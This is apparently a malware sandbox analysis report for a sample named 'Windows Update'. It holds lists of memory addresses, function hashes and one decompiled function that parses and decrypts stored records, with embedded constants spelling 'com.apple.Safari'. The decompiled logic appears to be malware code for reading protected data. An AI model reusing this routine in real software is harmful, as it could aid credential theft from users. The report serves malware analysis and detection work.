                                                                                                                    0x0009ea7e
                                                                                                                    0x0009ea7e
                                                                                                                    0x0009ea7f
                                                                                                                    0x0009ea84
                                                                                                                    0x0009ea84
                                                                                                                    0x0009e92f
                                                                                                                    0x00000000
                                                                                                                    0x0009e8c7
                                                                                                                    0x0009e8c7
                                                                                                                    0x0009e8ce
                                                                                                                    0x0009ed0f
                                                                                                                    0x0009ed14
                                                                                                                    0x0009ed15
                                                                                                                    0x0009ed16
                                                                                                                    0x0009ed17
                                                                                                                    0x0009ed18
                                                                                                                    0x0009ed19
                                                                                                                    0x0009ed1a
                                                                                                                    0x0009ed1b
                                                                                                                    0x0009ed1d
                                                                                                                    0x0009ed24
                                                                                                                    0x0009ed30
                                                                                                                    0x0009ed4d
                                                                                                                    0x0009ed4f
                                                                                                                    0x0009ed55
                                                                                                                    0x0009ed58
                                                                                                                    0x0009ed81
                                                                                                                    0x0009ed83
                                                                                                                    0x0009ed89
                                                                                                                    0x0009ed8b
                                                                                                                    0x0009edba
                                                                                                                    0x0009edbc
                                                                                                                    0x0009edc2
                                                                                                                    0x0009edc4
                                                                                                                    0x0009edf1
                                                                                                                    0x0009edfb
                                                                                                                    0x0009ee01
                                                                                                                    0x0009ee08
                                                                                                                    0x0009ee0e
                                                                                                                    0x0009f291
                                                                                                                    0x0009f294
                                                                                                                    0x0009f295
                                                                                                                    0x0009f296
                                                                                                                    0x0009f298
                                                                                                                    0x0009f2a1
                                                                                                                    0x0009ee14
                                                                                                                    0x0009ee1c
                                                                                                                    0x0009ee1e
                                                                                                                    0x0009ee20
                                                                                                                    0x0009ee27
                                                                                                                    0x0009ee2e
                                                                                                                    0x0009ee32
                                                                                                                    0x0009ee39
                                                                                                                    0x0009ee40
                                                                                                                    0x0009ee49
                                                                                                                    0x0009ee4b
                                                                                                                    0x0009ee4e
                                                                                                                    0x0009ee54
                                                                                                                    0x0009ee56
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009ee5c
                                                                                                                    0x0009ee5e
                                                                                                                    0x0009ee6b
                                                                                                                    0x0009ee6f
                                                                                                                    0x0009ee73
                                                                                                                    0x0009ee7a
                                                                                                                    0x0009ee81
                                                                                                                    0x0009ee88
                                                                                                                    0x0009ee8f
                                                                                                                    0x0009ee96
                                                                                                                    0x0009ee9d
                                                                                                                    0x0009eea4
                                                                                                                    0x0009eeab
                                                                                                                    0x0009eeb7
                                                                                                                    0x0009eed4
                                                                                                                    0x0009eee6
                                                                                                                    0x0009eee8
                                                                                                                    0x0009eeeb
                                                                                                                    0x0009eeed
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009eeef
                                                                                                                    0x0009eef1
                                                                                                                    0x0009eef7
                                                                                                                    0x0009eefc
                                                                                                                    0x0009ef0c
                                                                                                                    0x0009ef11
                                                                                                                    0x0009ef19
                                                                                                                    0x0009ef20
                                                                                                                    0x0009ef21
                                                                                                                    0x0009ef26
                                                                                                                    0x0009eef3
                                                                                                                    0x0009eef3
                                                                                                                    0x0009eef5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009eef5
                                                                                                                    0x0009ef29
                                                                                                                    0x0009ef37
                                                                                                                    0x0009ef39
                                                                                                                    0x0009ef3c
                                                                                                                    0x0009ef3e
                                                                                                                    0x0009ef40
                                                                                                                    0x0009ef42
                                                                                                                    0x0009ef48
                                                                                                                    0x0009ef4d
                                                                                                                    0x0009ef5d
                                                                                                                    0x0009ef62
                                                                                                                    0x0009ef6a
                                                                                                                    0x0009ef71
                                                                                                                    0x0009ef72
                                                                                                                    0x0009ef77
                                                                                                                    0x0009ef44
                                                                                                                    0x0009ef44
                                                                                                                    0x0009ef46
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009ef46
                                                                                                                    0x0009ef42
                                                                                                                    0x0009ef88
                                                                                                                    0x0009ef8a
                                                                                                                    0x0009ef8d
                                                                                                                    0x0009ef8f
                                                                                                                    0x0009eff9
                                                                                                                    0x0009eff9
                                                                                                                    0x0009efff
                                                                                                                    0x0009f002
                                                                                                                    0x0009f002
                                                                                                                    0x0009f004
                                                                                                                    0x0009f005
                                                                                                                    0x0009f005
                                                                                                                    0x0009f00b
                                                                                                                    0x0009f00e
                                                                                                                    0x0009f022
                                                                                                                    0x0009f024
                                                                                                                    0x0009f027
                                                                                                                    0x0009f029
                                                                                                                    0x0009f02b
                                                                                                                    0x0009f02d
                                                                                                                    0x0009f033
                                                                                                                    0x0009f038
                                                                                                                    0x0009f048
                                                                                                                    0x0009f04d
                                                                                                                    0x0009f02f
                                                                                                                    0x0009f02f
                                                                                                                    0x0009f031
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009f031
                                                                                                                    0x0009f02d
                                                                                                                    0x0009f061
                                                                                                                    0x0009f066
                                                                                                                    0x0009f06b
                                                                                                                    0x0009f06e
                                                                                                                    0x0009f070
                                                                                                                    0x0009f09c
                                                                                                                    0x0009f09d
                                                                                                                    0x0009f0a2
                                                                                                                    0x0009f0a3
                                                                                                                    0x0009f0ae
                                                                                                                    0x0009f0af
                                                                                                                    0x0009f0b4
                                                                                                                    0x0009f0ba
                                                                                                                    0x0009f0d1
                                                                                                                    0x0009f0d6
                                                                                                                    0x0009f0dc
                                                                                                                    0x0009f0e1
                                                                                                                    0x0009f0e6
                                                                                                                    0x0009f072
                                                                                                                    0x0009f078
                                                                                                                    0x0009f07f
                                                                                                                    0x0009f086
                                                                                                                    0x0009f087
                                                                                                                    0x0009f08c
                                                                                                                    0x0009f091
                                                                                                                    0x0009f091
                                                                                                                    0x0009f070
                                                                                                                    0x0009f0e9
                                                                                                                    0x0009f0ef
                                                                                                                    0x0009f0f2
                                                                                                                    0x0009f0f2
                                                                                                                    0x0009f0f4
                                                                                                                    0x0009f0f5
                                                                                                                    0x0009f0f5
                                                                                                                    0x0009f0fb
                                                                                                                    0x0009f0fe
                                                                                                                    0x0009f112
                                                                                                                    0x0009f114
                                                                                                                    0x0009f117
                                                                                                                    0x0009f119
                                                                                                                    0x0009f11b
                                                                                                                    0x0009f11d
                                                                                                                    0x0009f123
                                                                                                                    0x0009f128
                                                                                                                    0x0009f138
                                                                                                                    0x0009f13d
                                                                                                                    0x0009f11f
                                                                                                                    0x0009f11f
                                                                                                                    0x0009f121
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009f121
                                                                                                                    0x0009f11d
                                                                                                                    0x0009f14e
                                                                                                                    0x0009f150
                                                                                                                    0x0009f153
                                                                                                                    0x0009f155
                                                                                                                    0x0009f157
                                                                                                                    0x0009f159
                                                                                                                    0x0009f15f
                                                                                                                    0x0009f164
                                                                                                                    0x0009f174
                                                                                                                    0x0009f179
                                                                                                                    0x0009f15b
                                                                                                                    0x0009f15b
                                                                                                                    0x0009f15d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009f15d
                                                                                                                    0x0009f159
                                                                                                                    0x0009f17c
                                                                                                                    0x0009f182
                                                                                                                    0x0009f18c
                                                                                                                    0x0009f18c
                                                                                                                    0x0009f18e
                                                                                                                    0x0009f18f
                                                                                                                    0x0009f18f
                                                                                                                    0x0009f195
                                                                                                                    0x0009f198
                                                                                                                    0x0009f1ad
                                                                                                                    0x0009f1b2
                                                                                                                    0x0009f1b2
                                                                                                                    0x0009f1c6
                                                                                                                    0x0009f1cb
                                                                                                                    0x0009f1d0
                                                                                                                    0x0009f1d3
                                                                                                                    0x0009f1d5
                                                                                                                    0x0009f201
                                                                                                                    0x0009f202
                                                                                                                    0x0009f207
                                                                                                                    0x0009f208
                                                                                                                    0x0009f213
                                                                                                                    0x0009f214
                                                                                                                    0x0009f219
                                                                                                                    0x0009f21f
                                                                                                                    0x0009f236
                                                                                                                    0x0009f23b
                                                                                                                    0x0009f241
                                                                                                                    0x0009f246
                                                                                                                    0x0009f24b
                                                                                                                    0x0009f1d7
                                                                                                                    0x0009f1dd
                                                                                                                    0x0009f1e4
                                                                                                                    0x0009f1eb
                                                                                                                    0x0009f1ec
                                                                                                                    0x0009f1f1
                                                                                                                    0x0009f1f6
                                                                                                                    0x0009f1f6
                                                                                                                    0x0009f1d5
                                                                                                                    0x0009f24e
                                                                                                                    0x0009f250
                                                                                                                    0x0009f275
                                                                                                                    0x0009f281
                                                                                                                    0x0009f287
                                                                                                                    0x0009f28f
                                                                                                                    0x00000000
                                                                                                                    0x0009f252
                                                                                                                    0x0009f25a
                                                                                                                    0x0009f260
                                                                                                                    0x0009f262
                                                                                                                    0x0009f264
                                                                                                                    0x00000000
                                                                                                                    0x0009f264
                                                                                                                    0x0009ef91
                                                                                                                    0x0009ef91
                                                                                                                    0x0009ef93
                                                                                                                    0x0009ef99
                                                                                                                    0x0009efa0
                                                                                                                    0x0009efa6
                                                                                                                    0x0009efb6
                                                                                                                    0x0009efbb
                                                                                                                    0x0009efc1
                                                                                                                    0x0009efc4
                                                                                                                    0x0009efc9
                                                                                                                    0x0009f2a2
                                                                                                                    0x0009f2a7
                                                                                                                    0x0009f2a8
                                                                                                                    0x0009f2a9
                                                                                                                    0x0009f2aa
                                                                                                                    0x0009f2ab
                                                                                                                    0x0009f2ac
                                                                                                                    0x0009f2ad
                                                                                                                    0x0009f2af
                                                                                                                    0x0009f2b9
                                                                                                                    0x0009f2c3
                                                                                                                    0x0009f2cb
                                                                                                                    0x0009f2cc
                                                                                                                    0x0009f2cf
                                                                                                                    0x0009f2d0
                                                                                                                    0x0009f2d3
                                                                                                                    0x0009f2dd
                                                                                                                    0x0009f2e2
                                                                                                                    0x0009f2ea
                                                                                                                    0x0009f2ec
                                                                                                                    0x0009f2ed
                                                                                                                    0x0009f2f0
                                                                                                                    0x0009f2f3
                                                                                                                    0x0009f2f8
                                                                                                                    0x0009f2fb
                                                                                                                    0x0009f302
                                                                                                                    0x0009f304
                                                                                                                    0x0009f30c
                                                                                                                    0x0009f30c
                                                                                                                    0x0009f30e
                                                                                                                    0x0009f30f
                                                                                                                    0x0009f30f
                                                                                                                    0x0009f313
                                                                                                                    0x0009f315
                                                                                                                    0x0009f32a
                                                                                                                    0x0009f32c
                                                                                                                    0x0009f32f
                                                                                                                    0x0009f32f
                                                                                                                    0x0009f331
                                                                                                                    0x0009f332
                                                                                                                    0x0009f332
                                                                                                                    0x0009f336
                                                                                                                    0x0009f338
                                                                                                                    0x0009f33b
                                                                                                                    0x00000000
                                                                                                                    0x0009f33d
                                                                                                                    0x0009f33d
                                                                                                                    0x0009f340
                                                                                                                    0x0009f357
                                                                                                                    0x0009f361
                                                                                                                    0x0009f366
                                                                                                                    0x0009f342
                                                                                                                    0x0009f34c
                                                                                                                    0x0009f351
                                                                                                                    0x0009f351
                                                                                                                    0x0009f36a
                                                                                                                    0x0009f36d
                                                                                                                    0x0009f370
                                                                                                                    0x0009f373
                                                                                                                    0x0009f373
                                                                                                                    0x0009f375
                                                                                                                    0x0009f376
                                                                                                                    0x0009f376
                                                                                                                    0x0009f37a
                                                                                                                    0x0009f38b
                                                                                                                    0x0009f394
                                                                                                                    0x0009f397
                                                                                                                    0x0009f39a
                                                                                                                    0x0009f39d
                                                                                                                    0x0009f39d
                                                                                                                    0x0009f39e
                                                                                                                    0x0009f3a0
                                                                                                                    0x0009f3aa
                                                                                                                    0x0009f3ab
                                                                                                                    0x0009f3b8
                                                                                                                    0x0009f3ba
                                                                                                                    0x0009f3bd
                                                                                                                    0x0009f3c0
                                                                                                                    0x0009f3c1
                                                                                                                    0x0009f3c4
                                                                                                                    0x0009f3c6
                                                                                                                    0x0009f3c8
                                                                                                                    0x0009f3c8
                                                                                                                    0x0009f3c9
                                                                                                                    0x0009f3c9
                                                                                                                    0x0009f3cc
                                                                                                                    0x0009f3d4
                                                                                                                    0x0009f3d5
                                                                                                                    0x0009f3d9
                                                                                                                    0x0009f3e6
                                                                                                                    0x0009f3ed
                                                                                                                    0x0009f3f0
                                                                                                                    0x0009f3f3
                                                                                                                    0x0009f3f7
                                                                                                                    0x0009f3fa
                                                                                                                    0x0009f3fa
                                                                                                                    0x0009f3a0
                                                                                                                    0x0009f404
                                                                                                                    0x0009f405
                                                                                                                    0x0009f40c
                                                                                                                    0x0009f40d
                                                                                                                    0x0009f414
                                                                                                                    0x0009f41d
                                                                                                                    0x0009f41d
                                                                                                                    0x0009f317
                                                                                                                    0x0009f317
                                                                                                                    0x0009f317
                                                                                                                    0x0009f318
                                                                                                                    0x0009f31b
                                                                                                                    0x0009f31f
                                                                                                                    0x0009f329
                                                                                                                    0x0009f329
                                                                                                                    0x0009efcf
                                                                                                                    0x0009efcf
                                                                                                                    0x0009efd1
                                                                                                                    0x0009eff1
                                                                                                                    0x0009eff6
                                                                                                                    0x00000000
                                                                                                                    0x0009eff6
                                                                                                                    0x0009ef95
                                                                                                                    0x0009ef95
                                                                                                                    0x0009ef97
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009ef97
                                                                                                                    0x0009ef93
                                                                                                                    0x00000000
                                                                                                                    0x0009ef8f
                                                                                                                    0x0009ee5c
                                                                                                                    0x0009ee56
                                                                                                                    0x0009edc6
                                                                                                                    0x0009edc6
                                                                                                                    0x0009edcc
                                                                                                                    0x0009edd3
                                                                                                                    0x0009edd6
                                                                                                                    0x0009edd8
                                                                                                                    0x0009edd9
                                                                                                                    0x0009edda
                                                                                                                    0x0009edde
                                                                                                                    0x0009ede8
                                                                                                                    0x0009ede8
                                                                                                                    0x0009ed8d
                                                                                                                    0x0009ed8d
                                                                                                                    0x0009ed94
                                                                                                                    0x0009ed9a
                                                                                                                    0x0009ed9b
                                                                                                                    0x0009ed9f
                                                                                                                    0x0009eda9
                                                                                                                    0x0009eda9
                                                                                                                    0x0009ed5a
                                                                                                                    0x0009ed5a
                                                                                                                    0x0009ed60
                                                                                                                    0x0009ed64
                                                                                                                    0x0009ed6e
                                                                                                                    0x0009ed6e
                                                                                                                    0x0009e8d4
                                                                                                                    0x0009e8d4
                                                                                                                    0x00000000
                                                                                                                    0x0009e8d4
                                                                                                                    0x0009e8ce
                                                                                                                    0x00000000
                                                                                                                    0x0009ea87
                                                                                                                    0x0009ea87
                                                                                                                    0x0009ea93
                                                                                                                    0x0009ea98
                                                                                                                    0x0009ea99
                                                                                                                    0x0009ea9e
                                                                                                                    0x0009eaa1
                                                                                                                    0x0009eaa1
                                                                                                                    0x00000000
                                                                                                                    0x0009e8ac
                                                                                                                    0x0009e89d
                                                                                                                    0x0009e7a7
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$___from_strstr_to_strchr$_strstr$_fgets$__wfopen_s_fseek_wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 81871316-0
                                                                                                                    • Opcode ID: 9a5cd7a2a4d85095ff7c4285077792a9f491d08df6e4c15a0b41aaaf4179e889
                                                                                                                    • Instruction ID: 5b262132db9c5bdedeef2a385d3a5cca707e67d98a14a06ae2abb34d2c865678
                                                                                                                    • Opcode Fuzzy Hash: 9a5cd7a2a4d85095ff7c4285077792a9f491d08df6e4c15a0b41aaaf4179e889
                                                                                                                    • Instruction Fuzzy Hash: EEE1B87194024D6AEF61E760CD46FFA73BCAB14740F0440E9B64CE6483EB75AF48AB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A27CC Relevance: 33.5, APIs: 2, Strings: 17, Instructions: 220COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $$$$$$%$%$%$%$&$6$@$G$K$L$O$T$l$z
                                                                                                                    • API String ID: 0-1022184847
                                                                                                                    • Opcode ID: 4a94eeba491aeebf2c4c67bd46baf37af4b64f87b639ca27987f033cb4a91bea
                                                                                                                    • Instruction ID: 4136a80ae9afe9ec4b12606b0aeb56bc8a64d997ece3f7ad7c857a65c485c5a0
                                                                                                                    • Opcode Fuzzy Hash: 4a94eeba491aeebf2c4c67bd46baf37af4b64f87b639ca27987f033cb4a91bea
                                                                                                                    • Instruction Fuzzy Hash: 21810EB594022CABDB20DF91EC45BEEBBB8FB59704F4000A6EB09A6141D7755B88CF58
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0001C197 Relevance: 23.2, APIs: 7, Strings: 6, Instructions: 410COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E0001C197(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v24;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v273;
				intOrPtr _v277;
				char _v278;
				short _v280;
				intOrPtr _v289;
				intOrPtr _v293;
				char _v294;
				short _v296;
				char _v304;
				char _v1328;
				char _v2352;
				char _v4400;
				char _v5552;
				char _v5680;
				char _v5808;
				char _v5809;
				char _v5816;
				char _v5820;
				intOrPtr _v5824;
				short _v5828;
				intOrPtr _v5832;
				intOrPtr _v5836;
				signed int _v5840;
				intOrPtr* _v5844;
				signed char* _v5848;
				char _v10160;
				char* _v10164;
				signed int _v10168;
				char* _v10172;
				char _v10176;
				signed char* _v10180;
				char _v10184;
				char _v10204;
				void* __ebp;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				signed int _t168;
				signed int _t171;
				intOrPtr* _t172;
				signed char* _t180;
				signed int _t218;
				signed int _t221;
				intOrPtr* _t225;
				signed int _t227;
				signed int _t239;
				signed int _t246;
				signed int _t254;
				signed int _t256;
				void* _t260;
				intOrPtr _t264;
				signed char _t268;
				void* _t270;
				intOrPtr _t271;
				signed char* _t274;
				intOrPtr* _t286;
				signed int _t287;
				char _t289;
				void* _t301;
				signed char* _t303;
				intOrPtr* _t304;
				intOrPtr _t305;
				void* _t306;
				void* _t307;
				signed int _t309;
				signed int _t311;
				void* _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				void* _t316;
				void* _t317;
				void* _t318;
				signed int _t320;

				_t308 = __esi;
				_t302 = __edi;
				_t298 = __edx;
				_t262 = __ebx;
				E00077307(0x16d4);
				_v8 =  *0x481f80 ^ _t313;
				_v5816 = 0;
				_v5820 = 0;
				_v5836 = 0xffc7d83;
				_v5832 = 0x69e8b38e;
				_v5828 = 0xaf73;
				_v5809 = 0xff;
				_t160 = E0007928A( &_v5820, _a4, 0x470850);
				_t271 = _v5820;
				_t316 = _t315 + 0xc;
				if(_t271 == 0) {
					L30:
					__eflags = _v8 ^ _t313;
					return E000772F2(_t160, _t262, _v8 ^ _t313, _t298, _t302, _t308);
				} else {
					_t325 = _t160;
					if(_t160 != 0) {
						goto L30;
					} else {
						_push(__ebx);
						_push(2);
						_push(_t160);
						_push(_t271);
						E000797FE(__ebx, __edi, __esi, _t325);
						_push(_v5820);
						_t163 = E00079BD6(__ebx, __edx, __edi, __esi, _t325);
						_t263 = _t163;
						_v5840 = _t163;
						_t164 = E00077BCE(_t163, __edi, _t163);
						_t317 = _t316 + 0x14;
						_v5824 = _t164;
						_t326 = _t164;
						if(_t164 != 0) {
							_push(__esi);
							_push(_v5820);
							E00079CFF(_t263, __edi, __esi, __eflags);
							_t264 = _v5824;
							E000796C3(_t264, _t263, 1, _v5820);
							_push(_v5820);
							E00079010(_t264, __edi, __esi, __eflags);
							_t168 = _v5840;
							_t318 = _t317 + 0x18;
							_t309 = 0;
							__eflags = _t168;
							if(_t168 == 0) {
								L29:
								_t160 = L00078F6C(_t264);
								_pop(_t308);
								_pop(_t262);
								goto L30;
							} else {
								_push(__edi);
								while(1) {
									_t171 = L00077FC7(_t309 + _t264, 8, _t168 - _t309);
									_t318 = _t318 + 0xc;
									__eflags = _t171;
									if(_t171 == 0) {
										break;
									}
									_t172 = _t171 + 1;
									_t22 = _t172 - 8; // -7
									_t274 = _t22;
									_t309 = _t172 - _t264;
									_v5844 = _t172;
									_t24 = _t172 + 8; // 0x9
									_t303 = _t24;
									__eflags = _t274 - _t264;
									if(_t274 < _t264) {
										L27:
										_t168 = _v5840;
										__eflags = _t309 - _t168;
										if(_t309 < _t168) {
											continue;
										} else {
											break;
										}
									} else {
										__eflags = _t303 - _v5840 + _t264;
										if(_t303 > _v5840 + _t264) {
											goto L27;
										} else {
											_t298 = ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010;
											_v5848 =  &(_t274[2]);
											_t180 = _v5848;
											_t268 = ( *_t303 & 0x000000ff) << 0x00000018 | (_t303[1] & 0x000000ff) << 0x00000010 | (_t303[2] & 0x000000ff) << 0x00000008 | _t303[3] & 0x000000ff;
											_t282 = ( *_t180 & 0x000000ff) << 0x00000008 | _t180[1] & 0x000000ff | ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010;
											__eflags = (( *_t180 & 0x000000ff) << 0x00000008 | _t180[1] & 0x000000ff | ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010) - _t268 + 0x10;
											if((( *_t180 & 0x000000ff) << 0x00000008 | _t180[1] & 0x000000ff | ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010) != _t268 + 0x10) {
												L26:
												_t264 = _v5824;
												goto L27;
											} else {
												__eflags = _t268 - _v5840 - _t309 - 0xc;
												if(_t268 > _v5840 - _t309 - 0xc) {
													goto L26;
												} else {
													__eflags = _t268 - 8;
													if(_t268 < 8) {
														goto L26;
													} else {
														__eflags = _t268 & 0x00000007;
														if((_t268 & 0x00000007) != 0) {
															goto L26;
														} else {
															asm("movq xmm0, [ebp-0x16c8]");
															_t304 = _v5844;
															_v296 = _v5828;
															_v294 = _v5809;
															asm("movq [ebp-0x12c], xmm0");
															_v293 =  *_t304;
															_v289 =  *((intOrPtr*)(_t304 + 4));
															_push(0x10);
															E0001BAD7(_t268,  &_v304, 0x13,  &_v32);
															asm("movq xmm0, [ebp-0x1c]");
															asm("movq [ebp-0x12c], xmm0");
															asm("movq xmm0, [ebp-0x14]");
															_v280 = _v5828;
															asm("movq [ebp-0x124], xmm0");
															asm("movq xmm0, [ebp-0x16c8]");
															_v278 = _v5809;
															asm("movq [ebp-0x11c], xmm0");
															_v277 =  *_t304;
															_v273 =  *((intOrPtr*)(_t304 + 4));
															_push(0x10);
															E0001BAD7(_t268,  &_v304, 0x23,  &_v48);
															E00020397(_t282,  &_v32,  &_v5680);
															E00020397(_t282,  &_v24,  &_v5808);
															E00020397(_t282,  &_v48,  &_v5552);
															_v16 = _v40;
															_v12 = _v36;
															_v1328 = 0;
															E0001FB27(_t304 + 0xc,  &_v1328, _t268,  &_v5680,  &_v5808,  &_v5552,  &_v16, 0);
															_t218 = _v1328;
															_t318 = _t318 + 0x58;
															__eflags = _t218;
															if(_t218 == 0) {
																L25:
																_t309 = _t309 + _t268 + 0xc;
																__eflags = _t309;
																goto L26;
															} else {
																__eflags = _t218 - 8;
																if(_t218 == 8) {
																	goto L25;
																} else {
																	__eflags = _t313 + _t268 - 0x52d - ( *(_t313 + _t268 - 0x52d) & 0x000000ff) + 1;
																	E00077C87(_t313 + _t268 - 0x52d - ( *(_t313 + _t268 - 0x52d) & 0x000000ff) + 1, 0,  *(_t313 + _t268 - 0x52d) & 0x000000ff);
																	_t286 =  &_v1328;
																	_t320 = _t318 + 0xc;
																	_t301 = _t286 + 2;
																	do {
																		_t221 =  *_t286;
																		_t286 = _t286 + 2;
																		__eflags = _t221;
																	} while (_t221 != 0);
																	_t287 = _t286 - _t301;
																	__eflags = _t287;
																	 *0x470048(0, 0,  &_v1328, _t287 >> 1,  &_v2352, 0x400, 0, 0);
																	_t225 =  &_v1328;
																	_t298 = _t225 + 2;
																	do {
																		_t289 =  *_t225;
																		_t225 = _t225 + 2;
																		__eflags = _t289;
																	} while (_t289 != 0);
																	_t227 = _t225 - _t298 >> 1;
																	__eflags = _t227 - 0x400;
																	if(_t227 >= 0x400) {
																		L00077EEC();
																		asm("sbb al, 0x1e");
																		 *_t268 =  *_t268 + _t289;
																		_push(ds);
																		 *((intOrPtr*)(_t298 + 0x1e)) =  *((intOrPtr*)(_t298 + 0x1e)) + _t298;
																		 *((intOrPtr*)(_t309 + 0x1e)) =  *((intOrPtr*)(_t309 + 0x1e)) + _t268;
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_push(_t313);
																		_t314 = _t320;
																		E00077307(0x27bc);
																		_v60 =  *0x481f80 ^ _t314;
																		_push(_t304);
																		_t305 = _v44;
																		_push(0x2710);
																		_v204 = 0xf8a8ac1d;
																		_v200 = 0x3e48b8d3;
																		_v196 = 0xa3e7d48;
																		_v192 = 0x26dd0762;
																		_v188 = 0x38167e6;
																		_v184 = 0xa513b2e7;
																		_v180 = 0x4fee79b0;
																		_v176 = 0xed15410f;
																		_v172 = 0xe58c147b;
																		_v168 = 0xc10d464b;
																		_v164 = 0xe7d6fe8e;
																		_v160 = 0x8b067527;
																		_v156 = 0xfdc0049;
																		_v152 = 0xfd9ea030;
																		_v148 = 0xc8f18509;
																		_v144 = 0x8c175aa;
																		_v140 = 0xe2017905;
																		_v136 = 0x80afd897;
																		_v132 = 0x710b6038;
																		_v128 = 0x7753680e;
																		_v124 = 0xf6610f2f;
																		_v120 = 0x5c8f8e1d;
																		_v116 = 0x74213db2;
																		_v112 = 0x6b54b40;
																		_v108 = 0xbd7aab6e;
																		_v104 = 0x327ea98b;
																		_v100 = 0x24066e8f;
																		_v96 = 0xa5a429d9;
																		_v92 = 0xfd2326be;
																		_v88 = 0xf4cf1ee;
																		_v84 = 0xfb585e74;
																		_v80 = 0x91ef7491;
																		_v76 = 0x2e6d6f63;
																		_v72 = 0x6c707061;
																		_v68 = 0x61532e65;
																		_v64 = 0x69726166;
																		_t239 = E0001B777(_v48,  &_v10204);
																		__eflags = _t239;
																		if(_t239 == 0) {
																			L34:
																			_pop(_t306);
																			__eflags = _v16 ^ _t314;
																			return E000772F2(0, _t268, _v16 ^ _t314, _t298, _t306, _t309);
																		} else {
																			_v10168 = _t239;
																			_v10172 =  &_v160;
																			_v10164 =  &_v10160;
																			_v10176 = 0x90;
																			_t246 =  *0x470040( &_v10168, 0,  &_v10176, 0, 0, 0,  &_v10184);
																			__eflags = _t246;
																			if(_t246 != 0) {
																				_t311 =  *_v10180 & 0x000000ff;
																				E00077337(_t305,  &(_v10180[4]), _t311);
																				 *((char*)(_t305 + _t311)) = 0;
																				_t312 = _t309;
																				__eflags = _v16 ^ _t314;
																				_pop(_t307);
																				return E000772F2(1, _t268, _v16 ^ _t314, _t298, _t307, _t312);
																			} else {
																				 *0x470124();
																				goto L34;
																			}
																		}
																	} else {
																		 *((char*)(_t313 + _t227 - 0x92c)) = _t289;
																		_t254 = E0007835E( &_v2352, 0x470854, 4);
																		_t318 = _t320 + 0xc;
																		__eflags = _t254;
																		if(_t254 != 0) {
																			_t256 = _v5816 - 1;
																			__eflags = _t256 - 3;
																			if(_t256 <= 3) {
																				goto ( *((intOrPtr*)(0x401ee4 + _t256 * 4)));
																			}
																			_v5816 = 0;
																		} else {
																			E00077AF9( &_v4400, 0x400,  &_v2352);
																			_t318 = _t318 + 0xc;
																			_v5816 = 1;
																		}
																		goto L25;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									goto L36;
								}
								_pop(_t302);
								goto L29;
							}
						} else {
							_push(_v5820);
							_t260 = E00079010(_t263, __edi, __esi, _t326);
							_pop(_t270);
							return E000772F2(_t260, _t270, _v8 ^ _t313, __edx, __edi, __esi);
						}
					}
				}
				L36:
			}



























































































































                                                                                                                    0x0001c197
                                                                                                                    0x0001c197
